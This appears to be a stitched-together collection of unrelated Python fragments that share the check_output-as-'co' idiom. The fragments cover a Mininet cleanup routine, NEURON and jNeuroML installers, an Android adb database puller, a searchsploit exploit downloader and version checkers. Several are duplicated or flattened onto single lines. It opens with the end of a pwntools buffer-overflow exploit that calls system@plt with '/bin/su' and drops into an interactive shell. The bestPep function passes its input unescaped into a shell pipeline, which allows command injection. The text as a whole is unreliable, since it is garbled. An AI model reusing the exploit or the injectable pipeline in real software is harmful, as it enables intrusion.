# 23 bytes of padding, system@plt, fake return address, '/bin/su' arg.
payload = "A" * 23 + p32(system_plt) + 'BBBB' + p32(binsu)
p.sendline(payload)
p.interactive()
def bestPep(seq, db='RPHs'):
    """Return the accession of the top blastp hit for *seq* in *db*
    (evalue cutoff 0.01), as a stripped unicode string."""
    pipeline = 'echo "' + seq + '" | blastp -db ' + db + ' -evalue 0.01 -outfmt "6 sacc" -query /dev/stdin | head -n1'
    return co(pipeline, shell=True).decode('utf-8').strip()
def run(*args, **kwargs):
    "Run co and decode for python3"
    raw = co(*args, **kwargs)
    # Python 2's check_output already returns str; only 3.x needs decode.
    if version_info[ 0 ] >= 3:
        return raw.decode()
    return raw
def call(cmd):
    """Run *cmd* and return its decoded output.  String commands go
    through bash (shell=True); argument lists execute directly."""
    if isinstance(cmd, str):
        opts = {'shell': True, 'executable': '/bin/bash'}
    else:
        opts = {}
    return co(cmd, **opts).decode()
#!/usr/bin/env python3 # coding: utf-8 # In[ ]: from subprocess import check_output as co import re, requests headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36' } # In[ ]: keyword = input('term to search for in exploit-db: ') # In[ ]: exploits = str(co(['searchsploit', keyword, '-w', '-t']), 'utf-8') raw = re.sub('exploits', 'raw', exploits) url_list = re.findall(r'https://www.*', raw) for x in url_list: with open('{}'.format(x.split('/')[-2]), 'w') as f: f.write(requests.get(x, headers=headers).text) # In[ ]:
#!/usr/bin/python

from subprocess import check_output as co
from sys import exit

# Actually run bin/mn rather than importing via python path
# BUGFIX: check_output returns bytes on Python 3, which raised TypeError
# when concatenated with a str; decode() also works on Python 2 str.
version = 'Mininet ' + co( 'PYTHONPATH=. bin/mn --version 2>&1', shell=True ).decode()
version = version.strip()

# Find all Mininet path references
# BUGFIX: decode so the str split below works under Python 3.
lines = co( "egrep -or 'Mininet [0-9\.\+]+\w*' *", shell=True ).decode()

error = False

for line in lines.split( '\n' ):
    if line and 'Binary' not in line:
        # Each grep hit is "<file>:Mininet x.y.z".
        fname, fversion = line.split( ':' )
        if version != fversion:
            print( "%s: incorrect version '%s' (should be '%s')" % (
                fname, fversion, version ) )
            error = True

if error:
    exit( 1 )
def install_jnml():
    """Check out the jNeuroML jar directory from SourceForge into ~/jnml."""
    target = os.path.join(os.environ['HOME'], 'jnml')
    os.mkdir(target)
    with working_dir(target):
        out = co(['svn', 'checkout',
                  'https://svn.code.sf.net/p/neuroml/code/jNeuroMLJar'])
        print(out)
def download_database(DB_PATH):
    """Pull the database file at *DB_PATH* off an Android device via adb.

    On rooted devices ('su' in PERM) the file is staged through
    /data/local/tmp with a world-readable mode first; otherwise a direct
    `adb pull` is attempted.  The pulled file's MD5 is appended to the
    output md5sums manifest and its name recorded in DLLS.
    """
    DB_NAME = DB_PATH.split("/")[-1]
    # Round-trip the path through `ls` to confirm it exists on-device.
    if co([ADB, "shell", SUC, "ls", DB_PATH]).decode("UTF-8").replace("\r", "").replace("\n", "") == DB_PATH:
        if "su" in PERM:
            # Stage via /data/local/tmp so adb (non-root) can read it.
            co([ADB, "shell", SUC, "dd", "if=" + DB_PATH, "of=/data/local/tmp/" + DB_NAME])
            co([ADB, "shell", SUC, "chmod", "777", "/data/local/tmp/" + DB_NAME])
            co([ADB, "pull", "/data/local/tmp/" + DB_NAME, OUTPUT + SEP + "db" + SEP + DB_NAME])
            co([ADB, "shell", SUC, "rm", "/data/local/tmp/" + DB_NAME])
        else:
            co([ADB, "pull", DB_PATH, OUTPUT + SEP + "db" + SEP + DB_NAME])
    # Record the MD5 of whatever actually landed locally.
    if os.path.isfile(OUTPUT + SEP + "db" + SEP + DB_NAME) == True:
        fileh = open(OUTPUT + SEP + "db" + SEP + "md5sums", "a")
        DB_MD5 = hashlib.md5(open(OUTPUT + SEP + "db" + SEP + DB_NAME, "rb").read()).hexdigest()
        DLLS.append(DB_NAME)  # ; DLLS.append(DB_MD5)
        fileh.write(DB_MD5 + "\t" + DB_NAME + "\n")
        fileh.close()
os.chmod(ADB, "0755") else: sys.exit(download_adb) elif OS_CHECK == "win32": ADB = "adb.exe" SEP = "\\" if os.path.isfile(ADB) == False: sys.exit(download_adb) elif OS_CHECK == "darwin": ADB = "./adb_mac" SEP = "/" if os.path.isfile(ADB) == False: sys.exit(download_adb) try: ADB co([ADB, "start-server"]) except NameError: sys.exit(" Cannot determine OS!") # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # Unrooted (shell) devices, to print device information, limited extractions # print("\033[94m>>>>>>>>>> General Device Information.\033[0m") # Check for connected Android device if "unknown" in co([ADB, "get-state"]).decode("UTF-8"): sys.exit("\033[91m No Android device found!\033[0m") else: ADB_SER = co([ADB, "get-serialno"]).decode("UTF-8").replace("\n", "").replace("\r", "") print(" ADB serial: " + ADB_SER) REPORT.append(["ADB serial", ADB_SER])
raw_url = github_repo.link_to_raw_file_in_repo(".travis.yml") print(" .travis.yml found at %s\n" % raw_url) contents = osb.utils.get_page(raw_url) if 'omv' not in contents: print("That .travis.yml does not look like it uses OMV...") non_omv_tests += 1 else: testable_projects += 1 test_it = True else: print(" (No .travis.yml)") if test_it: target_dir = '%s/%s' % (test_dir, proj_id) print(co(['git', 'clone', str(github_repo.clone_url), target_dir])) with working_dir(target_dir): for key in branches.keys(): if proj_id.lower() == key: print(co(['git', 'checkout', branches[key]])) print("Running 'omv all' on"+ target_dir) test_all() passing_projects += 1 print("\nSo far: %i projects with OMV tests which pass\n" % (passing_projects)) end = datetime.datetime.now() print("\n%i projects checked, of which %i have OMV tests (%i non-OMV tested projects) and %i passed with OMV in %s seconds\n" % (projects, testable_projects, non_omv_tests, passing_projects, (end - start).seconds))
def get_clipboard():
    """Return the clipboard contents by invoking the CB helper command."""
    raw = co([CB])
    return raw.decode()
def maintainer(current_file):
    """Write the maintainer name found in makepkg.conf at the file's start."""
    current_file.seek(0, 0)
    # BUGFIX: check_output returns bytes on Python 3; decode before the
    # str split and concatenation below (decode() is a no-op-safe call
    # on Python 2 str as well).
    maint = co('grep PACKAGER /etc/makepkg.conf', shell=True).decode().split('"')[1]
    current_file.write("# Contributor: "+maint+"\n\n")
raw_url = github_repo.link_to_raw_file_in_repo(".travis.yml") print(" .travis.yml found at %s\n" % raw_url) contents = osb.utils.get_page(raw_url) if 'omv' not in contents: print("That .travis.yml does not look like it uses OMV...") non_omv_tests += 1 else: testable_projects += 1 test_it = True else: print(" (No .travis.yml)") if test_it: target_dir = '%s/%s' % (test_dir, proj_id) print co(['git', 'clone', str(github_repo.clone_url), target_dir]) with working_dir(target_dir): if proj_id in branches.keys(): print co(['git', 'checkout', branches[proj_id]]) print "Running 'omv all' on", target_dir test_all() passing_projects += 1 print("\nSo far: %i projects with OMV tests which pass\n" % (passing_projects)) end = datetime.datetime.now() print("\n%i projects checked, of which %i have OMV tests (%i non-OMV tested projects) and %i passed with OMV in %s seconds\n" % (projects, testable_projects, non_omv_tests, passing_projects, (end - start).seconds))
def install_neuron(get_latest=False):
    """Build and install NEURON (7.3 release, or the mercurial tip when
    *get_latest* is True) into ~/neuron, then install its Python bindings."""
    nrnpath = os.path.join(os.environ['HOME'], 'neuron')
    os.mkdir(nrnpath)
    with working_dir(nrnpath):
        if get_latest:
            # print() with a single parenthesized expression is valid on
            # Python 2 and 3 (was Py2-only print statements).
            print(co(['hg', 'clone', 'http://www.neuron.yale.edu/hg/neuron/nrn']))
            os.chdir('nrn')
            # build.sh generates the autotools configure script.
            print(co(['./build.sh']))
        else:
            print(co(['wget', 'http://www.neuron.yale.edu/ftp/neuron/versions/v7.3/nrn-7.3.tar.gz']))
            print(co(['tar', 'xzvf', 'nrn-7.3.tar.gz']))
            print(co(['mv', 'nrn-7.3', 'nrn']))
            os.chdir('nrn')
        path = os.getcwd()
        pyexec = sys.executable
        # configure takes all flags in one shell string, hence shell=True.
        co(["./configure --prefix=%s --without-iv --with-nrnpython=%s" % (path, pyexec)], shell=True)
        print(co(['make']))
        print(co(['make', 'install']))
        os.chdir('src/nrnpython')
        run_setup('./setup.py', ['install'])
def cleanup():
    """Clean up junk which might be left over from old runs; do fast
    stuff before slow dp and link removal!"""
    info("*** Removing excess controllers/ofprotocols/ofdatapaths/pings/noxes"
         "\n")
    zombies = 'controller ofprotocol ofdatapath ping nox_core lt-nox_core '
    zombies += 'ovs-openflowd ovs-controller udpbwtest mnexec ivs'
    # Note: real zombie processes can't actually be killed, since they
    # are already (un)dead. Then again,
    # you can't connect to them either, so they're mostly harmless.
    # Send SIGTERM first to give processes a chance to shutdown cleanly.
    sh( 'killall ' + zombies + ' 2> /dev/null' )
    time.sleep(1)
    sh( 'killall -9 ' + zombies + ' 2> /dev/null' )
    # And kill off sudo mnexec
    sh( 'pkill -9 -f "sudo mnexec"')
    info( "*** Removing junk from /tmp\n" )
    sh( 'rm -f /tmp/vconn* /tmp/vlogs* /tmp/*.out /tmp/*.log' )
    info( "*** Removing old X11 tunnels\n" )
    cleanUpScreens()
    info( "*** Removing excess kernel datapaths\n" )
    dps = sh( "ps ax | egrep -o 'dp[0-9]+' | sed 's/dp/nl:/'" ).splitlines()
    for dp in dps:
        if dp:
            sh( 'dpctl deldp ' + dp )
    info( "*** Removing OVS datapaths" )
    dps = sh("ovs-vsctl --timeout=1 list-br").strip().splitlines()
    if dps:
        sh( "ovs-vsctl " + " -- ".join( "--if-exists del-br " + dp
                                        for dp in dps if dp ) )
    # And in case the above didn't work...
    dps = sh("ovs-vsctl --timeout=1 list-br").strip().splitlines()
    for dp in dps:
        sh( 'ovs-vsctl del-br ' + dp )
    info( "*** Removing all links of the pattern foo-ethX\n" )
    links = sh( "ip link show | "
                "egrep -o '([-_.[:alnum:]]+-eth[[:digit:]]+)'" ).splitlines()
    for link in links:
        if link:
            sh( "ip link del " + link )
    info( "*** Killing stale mininet node processes\n" )
    sh( 'pkill -9 -f mininet:' )
    # Make sure they are gone
    while True:
        try:
            pids = co( 'pgrep -f mininet:'.split() )
        except:
            pids = ''
        if pids:
            # BUGFIX: flags were transposed ('pkill -f 9 mininet:'),
            # which matched the pattern '9' and never killed the stale
            # mininet processes.
            sh( 'pkill -9 -f mininet:' )
            sleep( .5 )
        else:
            break
    info( "*** Cleanup complete.\n" )
#!/usr/bin/python

from subprocess import check_output as co
from sys import exit

# Actually run bin/mn rather than importing via python path
# BUGFIX: check_output returns bytes on Python 3, which raised TypeError
# when concatenated with a str below; decode first.
version = "Mininet " + co("PYTHONPATH=. bin/mn --version", shell=True).decode()
version = version.strip()

# Find all Mininet path references (raw string avoids Python's
# invalid-escape-sequence deprecation warnings; value is unchanged)
lines = co(r"egrep -or 'Mininet [0-9\.\+]+\w*' *", shell=True).decode()

error = False

for line in lines.split("\n"):
    if line and "Binary" not in line:
        # Each grep hit is "<file>:Mininet x.y.z".
        fname, fversion = line.split(":")
        if version != fversion:
            print("%s: incorrect version '%s' (should be '%s')" % (fname, fversion, version))
            error = True

if error:
    exit(1)